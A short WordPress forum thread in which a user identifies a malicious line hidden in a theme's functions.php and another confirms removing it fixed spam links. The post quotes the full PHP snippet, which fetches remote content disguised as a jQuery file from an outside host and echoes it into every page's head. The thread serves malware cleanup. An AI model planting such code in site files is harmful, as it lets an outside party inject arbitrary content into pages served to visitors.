Forum Replies Created

Viewing 1 replies (of 1 total)
  • I have found the problem.

    Check your installed theme “functions.php” for this line:

    if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = “https://www.wpstats.org/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}
    For me, it was on line 3. Deleted the entire line, and…puff, no more sexy links in source code.

    Hope this helps, it took us some days of searching through the files….

    This is working.
    Thank you very much.

Viewing 1 replies (of 1 total)